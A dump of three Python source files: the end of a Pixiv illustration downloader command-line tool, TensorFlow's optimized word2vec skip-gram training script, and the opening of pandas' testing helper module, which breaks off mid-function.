data_list = user.get_all_user_illustrations(user_id)
download_illustrations(user, data_list, save_path, add_user_folder=True)
def download_by_ranking(user):
today = str(datetime.date.today())
save_path = os.path.join(get_default_save_path(), today + ' ranking')
data_list = user.get_ranking_illustrations()
download_illustrations(user, data_list, save_path, add_rank=True)
def download_by_history_ranking(user, date=''):
if not date:
date = input(_('Input the date:(eg:2015-07-10)'))
if not (re.search("^\d{4}-\d{2}-\d{2}", date)):
print(_('[invalid date format]'))
date = str(datetime.date.today() - datetime.timedelta(days=1))
save_path = os.path.join(get_default_save_path(), date + ' ranking')
data_list = user.get_ranking_illustrations(date=date)
download_illustrations(user, data_list, save_path, add_rank=True)
def artist_folder_scanner(user, user_id_list, save_path, final_list, fast):
while not user_id_list.empty():
user_info = user_id_list.get()
user_id = user_info['id']
folder = user_info['folder']
try:
if fast:
data_list = []
offset = 0
page_result = user.get_all_user_illustrations(user_id, offset, _ILLUST_PER_PAGE)
if len(page_result) > 0:
data_list.extend(page_result)
file_path = os.path.join(save_path, folder, data_list[-1]['image_urls']['large'].split('/')[-1])
while not os.path.exists(file_path) and len(page_result) == _ILLUST_PER_PAGE:
offset += _ILLUST_PER_PAGE
page_result = user.get_all_user_illustrations(user_id, offset, _ILLUST_PER_PAGE)
data_list.extend(page_result)
file_path = os.path.join(save_path, folder, data_list[-1]['image_urls']['large'].split('/')[-1])
# prevent rate limit
time.sleep(1)
else:
data_list = user.get_all_user_illustrations(user_id)
illustrations = PixivIllustModel.from_data(data_list)
count, checked_list = check_files(illustrations, save_path, add_user_folder=True, add_rank=False)[1:3]
if len(sys.argv) < 2 or count:
try:
print(_('Artists %s [%s]') % (folder, count))
except UnicodeError:
print(_('Artists %s ?? [%s]') % (user_id, count))
with _PROGRESS_LOCK:
for index in checked_list:
final_list.append(data_list[index])
except Exception:
traceback.print_exc()
user_id_list.task_done()
def update_exist(user, fast=True):
current_path = get_default_save_path()
final_list = []
user_id_list = queue.Queue()
for folder in os.listdir(current_path):
if os.path.isdir(os.path.join(current_path, folder)):
user_id = re.search('^(\d+) ', folder)
if user_id:
user_id = user_id.group(1)
user_id_list.put({'id': user_id, 'folder': folder})
for i in range(1):
# use one thread to prevent Rate Limit in new App API
scan_t = threading.Thread(target=artist_folder_scanner,
args=(user, user_id_list, current_path, final_list, fast,))
scan_t.daemon = True
scan_t.start()
user_id_list.join()
download_illustrations(user, final_list, current_path, add_user_folder=True)
def remove_repeat(_):
"""Delete xxxxx.img if xxxxx_p0.img exist"""
choice = input(_('Dangerous Action: continue?(y/n)'))
if choice == 'y':
illust_path = get_default_save_path()
for folder in os.listdir(illust_path):
if os.path.isdir(os.path.join(illust_path, folder)):
if re.search('^(\d+) ', folder):
path = os.path.join(illust_path, folder)
for file_name in os.listdir(path):
illustration_id = re.search('^\d+\.', file_name)
if illustration_id:
if os.path.isfile(os.path.join(path
, illustration_id.string.replace('.', '_p0.'))):
os.remove(os.path.join(path, file_name))
print('Delete', os.path.join(path, file_name))
def main():
user = PixivApi()
if len(sys.argv) > 1:
print(datetime.datetime.now().strftime('%X %x'))
ids = arguments['<id>']
is_rank = arguments['-r']
date = arguments['--date']
is_update = arguments['-u']
if ids:
download_by_user_id(user, ids)
elif is_rank:
if date:
date = date[0]
download_by_history_ranking(user, date)
else:
download_by_ranking(user)
elif is_update:
update_exist(user)
print(datetime.datetime.now().strftime('%X %x'))
else:
print(_(' Pixiv Downloader 2.4 ').center(77, '#'))
options = {
'1': download_by_user_id,
'2': download_by_ranking,
'3': download_by_history_ranking,
'4': update_exist,
'5': remove_repeat
}
while True:
print(_('Which do you want to:'))
for i in sorted(options.keys()):
print('\t %s %s' % (i, _(options[i].__name__).replace('_', ' ')))
choose = input('\t e %s \n:' % _('exit'))
if choose in [str(i) for i in range(1, len(options) + 1)]:
print((' ' + _(options[choose].__name__).replace('_', ' ') + ' ').center(60, '#') + '\n')
if choose == 4:
options[choose](user, False)
else:
options[choose](user)
print('\n' + (' ' + _(options[choose].__name__).replace('_', ' ') + _(' finished ')).center(60,
'#') + '\n')
elif choose == 'e':
break
else:
print(_('Wrong input!'))
if __name__ == '__main__':
arguments = docopt(__doc__, version='pixiv 3')
sys.exit(main())
|
word2vec_optimized.py | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Multi-threaded word2vec unbatched skip-gram model.
Trains the model described in:
(Mikolov, et. al.) Efficient Estimation of Word Representations in Vector Space
ICLR 2013.
http://arxiv.org/abs/1301.3781
This model does true SGD (i.e. no minibatching). To do this efficiently, custom
ops are used to sequentially process data within a 'batch'.
The key ops used are:
* skipgram custom op that does input processing.
* neg_train custom op that efficiently calculates and applies the gradient using
true SGD.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import sys
import threading
import time
from six.moves import xrange # pylint: disable=redefined-builtin
import numpy as np
import tensorflow as tf
word2vec = tf.load_op_library(os.path.join(os.path.dirname(os.path.realpath(__file__)), 'word2vec_ops.so'))
flags = tf.app.flags
flags.DEFINE_string("save_path", None, "Directory to write the model.")
flags.DEFINE_string(
"train_data", None,
"Training data. E.g., unzipped file http://mattmahoney.net/dc/text8.zip.")
flags.DEFINE_string(
"eval_data", None, "Analogy questions. "
"See README.md for how to get 'questions-words.txt'.")
flags.DEFINE_integer("embedding_size", 200, "The embedding dimension size.")
flags.DEFINE_integer(
"epochs_to_train", 15,
"Number of epochs to train. Each epoch processes the training data once "
"completely.")
flags.DEFINE_float("learning_rate", 0.025, "Initial learning rate.")
flags.DEFINE_integer("num_neg_samples", 25,
"Negative samples per training example.")
flags.DEFINE_integer("batch_size", 500,
"Numbers of training examples each step processes "
"(no minibatching).")
flags.DEFINE_integer("concurrent_steps", 12,
"The number of concurrent training steps.")
flags.DEFINE_integer("window_size", 5,
"The number of words to predict to the left and right "
"of the target word.")
flags.DEFINE_integer("min_count", 5,
"The minimum number of word occurrences for it to be "
"included in the vocabulary.")
flags.DEFINE_float("subsample", 1e-3,
"Subsample threshold for word occurrence. Words that appear "
"with higher frequency will be randomly down-sampled. Set "
"to 0 to disable.")
flags.DEFINE_boolean(
"interactive", False,
"If true, enters an IPython interactive session to play with the trained "
"model. E.g., try model.analogy(b'france', b'paris', b'russia') and "
"model.nearby([b'proton', b'elephant', b'maxwell'])")
FLAGS = flags.FLAGS
class Options(object):
"""Options used by our word2vec model."""
def __init__(self):
# Model options.
# Embedding dimension.
self.emb_dim = FLAGS.embedding_size
# Training options.
# The training text file.
self.train_data = FLAGS.train_data
# Number of negative samples per example.
self.num_samples = FLAGS.num_neg_samples
# The initial learning rate.
self.learning_rate = FLAGS.learning_rate
# Number of epochs to train. After these many epochs, the learning
# rate decays linearly to zero and the training stops.
self.epochs_to_train = FLAGS.epochs_to_train
# Concurrent training steps.
self.concurrent_steps = FLAGS.concurrent_steps
# Number of examples for one training step.
self.batch_size = FLAGS.batch_size
# The number of words to predict to the left and right of the target word.
self.window_size = FLAGS.window_size
# The minimum number of word occurrences for it to be included in the
# vocabulary.
self.min_count = FLAGS.min_count
# Subsampling threshold for word occurrence.
self.subsample = FLAGS.subsample
# Where to write out summaries.
self.save_path = FLAGS.save_path
if not os.path.exists(self.save_path):
os.makedirs(self.save_path)
# Eval options.
# The text file for eval.
self.eval_data = FLAGS.eval_data
class Word2Vec(object):
"""Word2Vec model (Skipgram)."""
def __init__(self, options, session):
self._options = options
self._session = session
self._word2id = {}
self._id2word = []
self.build_graph()
self.build_eval_graph()
self.save_vocab()
def read_analogies(self):
"""Reads through the analogy question file.
Returns:
questions: a [n, 4] numpy array containing the analogy question's
word ids.
questions_skipped: questions skipped due to unknown words.
"""
questions = []
questions_skipped = 0
with open(self._options.eval_data, "rb") as analogy_f:
for line in analogy_f:
if line.startswith(b":"): # Skip comments.
continue
words = line.strip().lower().split(b" ")
ids = [self._word2id.get(w.strip()) for w in words]
if None in ids or len(ids) != 4:
questions_skipped += 1
else:
questions.append(np.array(ids))
print("Eval analogy file: ", self._options.eval_data)
print("Questions: ", len(questions))
print("Skipped: ", questions_skipped)
self._analogy_questions = np.array(questions, dtype=np.int32)
def build_graph(self):
"""Build the model graph."""
opts = self._options
# The training data. A text file.
(words, counts, words_per_epoch, current_epoch, total_words_processed,
examples, labels) = word2vec.skipgram_word2vec(filename=opts.train_data,
batch_size=opts.batch_size,
window_size=opts.window_size,
min_count=opts.min_count,
subsample=opts.subsample)
(opts.vocab_words, opts.vocab_counts,
opts.words_per_epoch) = self._session.run([words, counts, words_per_epoch])
opts.vocab_size = len(opts.vocab_words)
print("Data file: ", opts.train_data)
print("Vocab size: ", opts.vocab_size - 1, " + UNK")
print("Words per epoch: ", opts.words_per_epoch)
self._id2word = opts.vocab_words
for i, w in enumerate(self._id2word):
self._word2id[w] = i
# Declare all variables we need.
# Input words embedding: [vocab_size, emb_dim]
w_in = tf.Variable(
tf.random_uniform(
[opts.vocab_size,
opts.emb_dim], -0.5 / opts.emb_dim, 0.5 / opts.emb_dim),
name="w_in")
# Global step: scalar, i.e., shape [].
w_out = tf.Variable(tf.zeros([opts.vocab_size, opts.emb_dim]), name="w_out")
# Global step: []
global_step = tf.Variable(0, name="global_step")
# Linear learning rate decay.
words_to_train = float(opts.words_per_epoch * opts.epochs_to_train)
lr = opts.learning_rate * tf.maximum(
0.0001,
1.0 - tf.cast(total_words_processed, tf.float32) / words_to_train)
# Training nodes.
inc = global_step.assign_add(1)
with tf.control_dependencies([inc]):
train = word2vec.neg_train_word2vec(w_in,
w_out,
examples,
labels,
lr,
vocab_count=opts.vocab_counts.tolist(),
num_negative_samples=opts.num_samples)
self._w_in = w_in
self._examples = examples
self._labels = labels
self._lr = lr
self._train = train
self.global_step = global_step
self._epoch = current_epoch
self._words = total_words_processed
def save_vocab(self):
"""Save the vocabulary to a file so the model can be reloaded."""
opts = self._options
with open(os.path.join(opts.save_path, "vocab.txt"), "w") as f:
for i in xrange(opts.vocab_size):
vocab_word = tf.compat.as_text(opts.vocab_words[i]).encode("utf-8")
f.write("%s %d\n" % (vocab_word,
opts.vocab_counts[i]))
def build_eval_graph(self):
"""Build the evaluation graph."""
# Eval graph
opts = self._options
# Each analogy task is to predict the 4th word (d) given three
# words: a, b, c. E.g., a=italy, b=rome, c=france, we should
# predict d=paris.
# The eval feeds three vectors of word ids for a, b, c, each of
# which is of size N, where N is the number of analogies we want to
# evaluate in one batch.
analogy_a = tf.placeholder(dtype=tf.int32) # [N]
analogy_b = tf.placeholder(dtype=tf.int32) # [N]
analogy_c = tf.placeholder(dtype=tf.int32) # [N]
# Normalized word embeddings of shape [vocab_size, emb_dim].
nemb = tf.nn.l2_normalize(self._w_in, 1)
# Each row of a_emb, b_emb, c_emb is a word's embedding vector.
# They all have the shape [N, emb_dim]
a_emb = tf.gather(nemb, analogy_a) # a's embs
b_emb = tf.gather(nemb, analogy_b) # b's embs
c_emb = tf.gather(nemb, analogy_c) # c's embs
# We expect that d's embedding vectors on the unit hyper-sphere is
# near: c_emb + (b_emb - a_emb), which has the shape [N, emb_dim].
target = c_emb + (b_emb - a_emb)
# Compute cosine distance between each pair of target and vocab.
# dist has shape [N, vocab_size].
dist = tf.matmul(target, nemb, transpose_b=True)
# For each question (row in dist), find the top 4 words.
_, pred_idx = tf.nn.top_k(dist, 4)
# Nodes for computing neighbors for a given word according to
# their cosine distance.
nearby_word = tf.placeholder(dtype=tf.int32) # word id
nearby_emb = tf.gather(nemb, nearby_word)
nearby_dist = tf.matmul(nearby_emb, nemb, transpose_b=True)
nearby_val, nearby_idx = tf.nn.top_k(nearby_dist,
min(1000, opts.vocab_size))
# Nodes in the construct graph which are used by training and
# evaluation to run/feed/fetch.
self._analogy_a = analogy_a
self._analogy_b = analogy_b
self._analogy_c = analogy_c
self._analogy_pred_idx = pred_idx
self._nearby_word = nearby_word
self._nearby_val = nearby_val
self._nearby_idx = nearby_idx
# Properly initialize all variables.
tf.global_variables_initializer().run()
self.saver = tf.train.Saver()
def _train_thread_body(self):
initial_epoch, = self._session.run([self._epoch])
while True:
_, epoch = self._session.run([self._train, self._epoch])
if epoch != initial_epoch:
break
def train(self):
"""Train the model."""
opts = self._options
initial_epoch, initial_words = self._session.run([self._epoch, self._words])
workers = []
for _ in xrange(opts.concurrent_steps):
t = threading.Thread(target=self._train_thread_body)
t.start()
workers.append(t)
last_words, last_time = initial_words, time.time()
while True:
time.sleep(5) # Reports our progress once a while.
(epoch, step, words, lr) = self._session.run(
[self._epoch, self.global_step, self._words, self._lr])
now = time.time()
last_words, last_time, rate = words, now, (words - last_words) / (
now - last_time)
print("Epoch %4d Step %8d: lr = %5.3f words/sec = %8.0f\r" % (epoch, step,
lr, rate),
end="")
sys.stdout.flush()
if epoch != initial_epoch:
break
for t in workers:
t.join()
def _predict(self, analogy):
"""Predict the top 4 answers for analogy questions."""
idx, = self._session.run([self._analogy_pred_idx], {
self._analogy_a: analogy[:, 0],
self._analogy_b: analogy[:, 1],
self._analogy_c: analogy[:, 2]
})
return idx
def eval(self):
"""Evaluate analogy questions and reports accuracy."""
# How many questions we get right at precision@1.
correct = 0
try:
total = self._analogy_questions.shape[0]
except AttributeError as e:
raise AttributeError("Need to read analogy questions.")
start = 0
while start < total:
limit = start + 2500
sub = self._analogy_questions[start:limit, :]
idx = self._predict(sub)
start = limit
for question in xrange(sub.shape[0]):
for j in xrange(4):
if idx[question, j] == sub[question, 3]:
# Bingo! We predicted correctly. E.g., [italy, rome, france, paris].
correct += 1
break
elif idx[question, j] in sub[question, :3]:
# We need to skip words already in the question.
continue
else:
# The correct label is not the precision@1
break
print()
print("Eval %4d/%d accuracy = %4.1f%%" % (correct, total,
correct * 100.0 / total))
def analogy(self, w0, w1, w2):
"""Predict word w3 as in w0:w1 vs w2:w3."""
wid = np.array([[self._word2id.get(w, 0) for w in [w0, w1, w2]]])
idx = self._predict(wid)
for c in [self._id2word[i] for i in idx[0, :]]:
if c not in [w0, w1, w2]:
print(c)
break
print("unknown")
def nearby(self, words, num=20):
"""Prints out nearby words given a list of words."""
ids = np.array([self._word2id.get(x, 0) for x in words])
vals, idx = self._session.run(
[self._nearby_val, self._nearby_idx], {self._nearby_word: ids})
for i in xrange(len(words)):
print("\n%s\n=====================================" % (words[i]))
for (neighbor, distance) in zip(idx[i, :num], vals[i, :num]):
print("%-20s %6.4f" % (self._id2word[neighbor], distance))
def _start_shell(local_ns=None):
# An interactive shell is useful for debugging/development.
import IPython
user_ns = {}
if local_ns:
user_ns.update(local_ns)
user_ns.update(globals())
IPython.start_ipython(argv=[], user_ns=user_ns)
def main(_):
"""Train a word2vec model."""
if not FLAGS.train_data or not FLAGS.eval_data or not FLAGS.save_path:
print("--train_data --eval_data and --save_path must be specified.")
sys.exit(1)
opts = Options()
with tf.Graph().as_default(), tf.Session() as session:
with tf.device("/cpu:0"):
model = Word2Vec(opts, session)
model.read_analogies() # Read analogy questions
for _ in xrange(opts.epochs_to_train):
model.train() # Process one epoch
model.eval() # Eval analogies.
# Perform a final save.
model.saver.save(session, os.path.join(opts.save_path, "model.ckpt"),
global_step=model.global_step)
if FLAGS.interactive:
# E.g.,
# [0]: model.analogy(b'france', b'paris', b'russia')
# [1]: model.nearby([b'proton', b'elephant', b'maxwell'])
_start_shell(locals())
if __name__ == "__main__":
tf.app.run()
|
__init__.py | from __future__ import annotations
import collections
from datetime import datetime
from functools import wraps
import operator
import os
import re
import string
from typing import (
TYPE_CHECKING,
Callable,
ContextManager,
Counter,
Iterable,
List,
Type,
)
import warnings
import numpy as np
from pandas._config.localization import ( # noqa:F401
can_set_locale,
get_locales,
set_locale,
)
from pandas._typing import Dtype
from pandas.core.dtypes.common import (
is_datetime64_dtype,
is_datetime64tz_dtype,
is_period_dtype,
is_sequence,
is_timedelta64_dtype,
)
import pandas as pd
from pandas import (
Categorical,
CategoricalIndex,
DataFrame,
DatetimeIndex,
Index,
IntervalIndex,
MultiIndex,
RangeIndex,
Series,
bdate_range,
)
from pandas._testing._io import ( # noqa:F401
close,
network,
round_trip_localpath,
round_trip_pathlib,
round_trip_pickle,
with_connectivity_check,
write_to_compressed,
)
from pandas._testing._random import ( # noqa:F401
randbool,
rands,
rands_array,
randu_array,
)
from pandas._testing._warnings import assert_produces_warning # noqa:F401
from pandas._testing.asserters import ( # noqa:F401
assert_almost_equal,
assert_attr_equal,
assert_categorical_equal,
assert_class_equal,
assert_contains_all,
assert_copy,
assert_datetime_array_equal,
assert_dict_equal,
assert_equal,
assert_extension_array_equal,
assert_frame_equal,
assert_index_equal,
assert_interval_array_equal,
assert_is_sorted,
assert_is_valid_plot_return_object,
assert_numpy_array_equal,
assert_period_array_equal,
assert_series_equal,
assert_sp_array_equal,
assert_timedelta_array_equal,
raise_assert_detail,
)
from pandas._testing.contexts import ( # noqa:F401
RNGContext,
decompress_file,
ensure_clean,
ensure_clean_dir,
ensure_safe_environment_variables,
set_timezone,
use_numexpr,
with_csv_dialect,
)
from pandas.core.arrays import DatetimeArray, PeriodArray, TimedeltaArray, period_array
if TYPE_CHECKING:
from pandas import PeriodIndex, TimedeltaIndex
_N = 30
_K = 4
UNSIGNED_INT_DTYPES: List[Dtype] = ["uint8", "uint16", "uint32", "uint64"]
UNSIGNED_EA_INT_DTYPES: List[Dtype] = ["UInt8", "UInt16", "UInt32", "UInt64"]
SIGNED_INT_DTYPES: List[Dtype] = [int, "int8", "int16", "int32", "int64"]
SIGNED_EA_INT_DTYPES: List[Dtype] = ["Int8", "Int16", "Int32", "Int64"]
ALL_INT_DTYPES = UNSIGNED_INT_DTYPES + SIGNED_INT_DTYPES
ALL_EA_INT_DTYPES = UNSIGNED_EA_INT_DTYPES + SIGNED_EA_INT_DTYPES
FLOAT_DTYPES: List[Dtype] = [float, "float32", "float64"]
FLOAT_EA_DTYPES: List[Dtype] = ["Float32", "Float64"]
COMPLEX_DTYPES: List[Dtype] = [complex, "complex64", "complex128"]
STRING_DTYPES: List[Dtype] = [str, "str", "U"]
DATETIME64_DTYPES: List[Dtype] = ["datetime64[ns]", "M8[ns]"]
TIMEDELTA64_DTYPES: List[Dtype] = ["timedelta64[ns]", "m8[ns]"]
BOOL_DTYPES: List[Dtype] = [bool, "bool"]
BYTES_DTYPES: List[Dtype] = [bytes, "bytes"]
OBJECT_DTYPES: List[Dtype] = [object, "object"]
ALL_REAL_DTYPES = FLOAT_DTYPES + ALL_INT_DTYPES
ALL_NUMPY_DTYPES = (
ALL_REAL_DTYPES
+ COMPLEX_DTYPES
+ STRING_DTYPES
+ DATETIME64_DTYPES
+ TIMEDELTA64_DTYPES
+ BOOL_DTYPES
+ OBJECT_DTYPES
+ BYTES_DTYPES
)
NULL_OBJECTS = [None, np.nan, pd.NaT, float("nan"), pd.NA]
EMPTY_STRING_PATTERN = re.compile("^$")
# set testing_mode
_testing_mode_warnings = (DeprecationWarning, ResourceWarning)
def set_testing_mode():
# set the testing mode filters
testing_mode = os.environ.get("PANDAS_TESTING_MODE", "None")
if "deprecate" in testing_mode:
for category in _testing_mode_warnings:
warnings.simplefilter("always", category)
def reset_testing_mode():
# reset the testing mode filters
testing_mode = os.environ.get("PANDAS_TESTING_MODE", "None")
if "deprecate" in testing_mode:
for category in _testing_mode_warnings:
warnings.simplefilter("ignore", category)
set_testing_mode()
def reset_display_options():
"""
Reset the display options for printing and representing objects.
"""
pd.reset_option("^display.", silent=True)
# -----------------------------------------------------------------------------
# Comparators
def equalContents(arr1, arr2) -> bool:
"""
Checks if the set of unique elements of arr1 and arr2 are equivalent.
"""
return frozenset(arr1) == frozenset(arr2)
def box_expected(expected, box_cls, transpose=True):
"""
Helper function to wrap the expected output of a test in a given box_class.
Parameters
----------
expected : np.ndarray, Index, Series
box_cls : {Index, Series, DataFrame}
Returns
-------
subclass of box_cls
"""
if box_cls is pd.array:
expected = pd.array(expected)
elif box_cls is pd.Index:
expected = pd.Index(expected)
elif box_cls is pd.Series:
expected = pd.Series(expected)
elif box_cls is pd.DataFrame:
expected = pd.Series(expected).to_frame()
if transpose:
# for vector operations, we need a DataFrame to be a single-row,
# not a single-column, in order to operate against non-DataFrame
# vectors of the same length.
expected = expected.T
elif box_cls is PeriodArray:
# the PeriodArray constructor is not as flexible as period_array
expected = period_array(expected)
elif box_cls is DatetimeArray:
expected = DatetimeArray(expected)
elif box_cls is TimedeltaArray:
expected = TimedeltaArray(expected)
elif box_cls is np.ndarray:
expected = np.array(expected)
elif box_cls is to_array:
expected = to_array(expected)
else:
raise NotImplementedError(box_cls)
return expected
def to_array(obj):
# temporary implementation until we get pd.array in place
dtype = getattr(obj, "dtype", None)
if is_period_dtype(dtype):
return period_array(obj)
elif is_datetime64_dtype(dtype) or is_datetime64tz_dtype(dtype):
return DatetimeArray._from_sequence(obj)
elif is_timedelta64_dtype(dtype):
return TimedeltaArray._from_sequence(obj)
else:
return np.array(obj)
# -----------------------------------------------------------------------------
# Others
def getCols(k):
return string.ascii_uppercase[:k]
# make index
def makeStringIndex(k=10, name=None):
return Index(rands_array(nchars=10, size=k), name=name)
def makeUnicodeIndex(k=10, name=None):
return Index(randu_array(nchars=10, size=k), name=name)
def makeCategoricalIndex(k=10, n=3, name=None, **kwargs):
""" make a length k index or n categories """
x = rands_array(nchars=4, size=n)
return CategoricalIndex(
Categorical.from_codes(np.arange(k) % n, categories=x), name=name, **kwargs
)
def makeIntervalIndex(k=10, name=None, **kwargs):
""" make a length k IntervalIndex """
x = np.linspace(0, 100, num=(k + 1))
return IntervalIndex.from_breaks(x, name=name, **kwargs)
def makeBoolIndex(k=10, name=None):
if k == 1:
return Index([True], name=name)
elif k == 2:
return Index([False, True], name=name)
return Index([False, True] + [False] * (k - 2), name=name)
def makeIntIndex(k=10, name=None):
return Index(list(range(k)), name=name)
def makeUIntIndex(k=10, name=None):
return Index([2 ** 63 + i for i in range(k)], name=name)
def makeRangeIndex(k=10, name=None, **kwargs):
return RangeIndex(0, k, 1, name=name, **kwargs)
def makeFloatIndex(k=10, name=None):
values = sorted(np.random.random_sample(k)) - np.random.random_sample(1)
return Index(values * (10 ** np.random.randint(0, 9)), name=name)
def makeDateIndex(k: int = 10, freq="B", name=None, **kwargs) -> DatetimeIndex:
dt = datetime(2000, 1, 1)
dr = bdate_range(dt, periods=k, freq=freq, name=name)
return DatetimeIndex(dr, name=name, **kwargs)
def makeTimedeltaIndex(k: int = 10, freq="D", name=None, **kwargs) -> TimedeltaIndex:
return pd.timedelta_range(start="1 day", periods=k, freq=freq, name=name, **kwargs)
def makePeriodIndex(k: int = 10, name=None, **kwargs) -> PeriodIndex:
dt = datetime(2000, 1, 1)
return pd.period_range(start=dt, periods=k, freq="B", name=name, **kwargs)
def makeMultiIndex(k=10, names=None, **kwargs):
return MultiIndex.from_product((("foo", "bar"), (1, 2)), names=names, **kwargs)
_names = [
"Alice",
"Bob",
"Charlie",
"Dan",
"Edith",
"Frank",
"George",
"Hannah",
"Ingrid",
"Jerry",
"Kevin",
"Laura",
"Michael",
"Norbert",
"Oliver",
"Patricia",
"Quinn",
"Ray",
"Sarah",
"Tim",
"Ursula",
"Victor",
"Wendy",
"Xavier",
"Yvonne",
"Zelda",
]
def _make_timeseries(start="2000-01-01", end="2000-12-31", freq="1D", seed=None):
"""
Make a DataFrame with a DatetimeIndex
Parameters
----------
start : str or Timestamp, default "2000-01-01"
The start of the index. Passed to date_range with `freq`.
end : str or Timestamp, default "2000-12-31"
The end of the index. Passed to date_range with `freq`.
freq : str or Freq
The frequency to use for the DatetimeIndex
seed : int, optional
The random state seed.
* name : object dtype with string names
* id : int dtype with
* x, y : float dtype
Examples
--------
>>> _make_timeseries()
id name x y
timestamp
2000-01-01 982 Frank 0.031261 0.986727
2000-01-02 1025 Edith -0.086358 -0.032920
2000-01-03 982 Edith 0.473177 0.298654
2000-01-04 1009 Sarah 0.534344 -0.750377
2000-01-05 963 Zelda -0.271573 0.054424
... ... ... ... ...
2000-12-27 980 Ingrid -0.132333 -0.422195
2000-12-28 972 Frank -0.376007 -0.298687
2000-12-29 1009 Ursula -0.865047 -0.503133
2000-12-30 1000 Hannah -0.063757 -0.507336
2000-12-31 972 Tim -0.869120 0.531685
"""
index = pd.date_range(start=start, end=end, freq=freq, name="timestamp")
n = len(index)
state = np.random.RandomState(seed)
columns = {
"name": state.choice(_names, size=n),
"id": state.poisson(1000, size=n),
"x": state.rand(n) * 2 - 1,
"y": state.rand(n) * 2 - 1,
}
df = pd.DataFrame(columns, index=index, columns=sorted(columns))
if df.index[-1] == end:
df = df.iloc[:-1]
return df
def index_subclass_makers_generator():
make_index_funcs = [
makeDateIndex,
makePeriodIndex,
makeTimedeltaIndex,
makeRangeIndex,
makeIntervalIndex,
makeCategoricalIndex,
makeMultiIndex,
]
yield from make_index_funcs
def all_timeseries_index_generator(k: int = 10) -> Iterable[Index]:
"""
Generator which can be iterated over to get instances of all the classes
which represent time-series.
Parameters
----------
k: length of each of the index instances
"""
make_index_funcs: List[Callable[..., Index]] = [
makeDateIndex,
makePeriodIndex,
makeTimedeltaIndex,
]
for make_index_func in make_index_funcs:
yield make_index_func(k=k)
# make series
def makeFloatSeries(name=None):
index = makeStringIndex(_N)
return Series(np.random.randn(_N), index=index, name=name)
def makeStringSeries(name=None):
index = makeStringIndex(_N)
return Series(np.random.randn(_N), index=index, name=name)
def makeObjectSeries(name=None):
data = makeStringIndex(_N)
data = Index(data, dtype=object)
index = makeStringIndex(_N)
return Series(data, index=index, name=name)
def getSeriesData():
index = makeStringIndex(_N)
return {c: Series(np.random.randn(_N), index=index) for c in getCols(_K)}
def makeTimeSeries(nper=None, freq="B", name=None):
if nper is None:
nper = _N
return Series(
np.random.randn(nper), index=makeDateIndex(nper, freq=freq), name=name
)
def makePeriodSeries(nper=None, name=None):
if nper is None:
nper = _N
return Series(np.random.randn(nper), index=makePeriodIndex(nper), name=name)
def getTimeSeriesData(nper=None, freq="B"):
return {c: makeTimeSeries(nper, freq) for c in getCols(_K)}
def getPeriodData(nper=None):
return {c: makePeriodSeries(nper) for c in getCols(_K)}
# make frame
def makeTimeDataFrame(nper=None, freq="B"):
data = getTimeSeriesData(nper, freq)
return DataFrame(data)
def makeDataFrame() -> DataFrame:
data = getSeriesData()
return DataFrame(data)
def getMixedTypeDict():
index = Index(["a", "b", "c", "d", "e"])
data = {
"A": [0.0, 1.0, 2.0, 3.0, 4.0],
"B": [0.0, 1.0, 0.0, 1.0, 0.0],
"C": ["foo1", "foo2", "foo3", "foo4", "foo5"],
"D": bdate_range("1/1/2009", periods=5),
}
return index, data
def makeMixedDataFrame():
return DataFrame(getMixedTypeDict()[1])
def makePeriodFrame(nper=None):
data = getPeriodData(nper)
return DataFrame(data)
def makeCustomIndex(
nentries, nlevels, prefix="#", names=False, ndupe_l=None, idx_type=None
):
"""
Create an index/multindex with given dimensions, levels, names, etc'
nentries - number of entries in index
nlevels - number of levels (> 1 produces multindex)
prefix - a string prefix for labels
names - (Optional), bool or list of strings. if True will use default
names, if false will use no names, if a list is given, the name of
each level in the index will be taken from the list.
ndupe_l - (Optional), list of ints, the number of rows for which the
label will repeated at the corresponding level, you can specify just
the first few, the rest will use the default ndupe_l of 1.
len(ndupe_l) <= nlevels.
idx_type - "i"/"f"/"s"/"u"/"dt"/"p"/"td".
If idx_type is not None, `idx_nlevels` must be 1.
"i"/"f" creates an integer/float index,
"s"/"u" creates a string/unicode index
"dt" create a datetime index.
"td" create a datetime index.
if unspecified, string labels will be generated.
"""
if ndupe_l is None:
ndupe_l = [1] * nlevels
assert is_sequence(ndupe_l) and len(ndupe_l) <= nlevels
assert names is None or names is False or names is True or len(names) is nlevels
assert idx_type is None or (
idx_type in ("i", "f", "s", "u", "dt", "p", "td") and nlevels == 1
)
if names is True:
# build default names
names = [prefix + str(i) for i in range(nlevels)]
if names is False:
# pass None to index constructor for no name
names = None
# make singleton case uniform
if isinstance(names, str) and nlevels == 1:
names = [names]
# specific 1D index type requested?
idx_func = {
"i": makeIntIndex,
"f": makeFloatIndex,
"s": makeStringIndex,
"u": makeUnicodeIndex,
"dt": makeDateIndex,
"td": makeTimedeltaIndex,
"p": makePeriodIndex,
}.get(idx_type)
if idx_func:
# pandas\_testing.py:2120: error: Cannot call function of unknown type
idx = idx_func(nentries) # type: ignore[operator]
# but we need to fill in the name
if names:
idx.name = names[0]
return idx
elif idx_type is not None:
raise ValueError(
f"{repr(idx_type)} is not a legal value for `idx_type`, "
"use 'i'/'f'/'s'/'u'/'dt'/'p'/'td'."
)
if len(ndupe_l) < nlevels:
ndupe_l.extend([1] * (nlevels - len(ndupe_l)))
assert len(ndupe_l) == nlevels
assert all(x > 0 for x in ndupe_l)
list_of_lists = []
for i in range(nlevels):
def keyfunc(x):
import re
numeric_tuple = re.sub(r"[^\d_]_?", "", x).split("_")
return [int(num) for num in numeric_tuple]
# build a list of lists to create the index from
div_factor = nentries // ndupe_l[i] + 1
# Deprecated since version 3.9: collections.Counter now supports []. See PEP 585
# and Generic Alias Type.
cnt: Counter[str] = collections.Counter()
for j in range(div_factor):
label = f"{prefix}_l{i}_g{j}"
cnt[label] = ndupe_l[i]
# cute Counter trick
result = sorted(cnt.elements(), key=keyfunc)[:nentries]
list_of_lists.append(result)
tuples = list(zip(*list_of_lists))
# convert tuples to index
if nentries == 1:
# we have a single level of tuples, i.e. a regular Index
index = Index(tuples[0], name=names[0])
elif nlevels == 1:
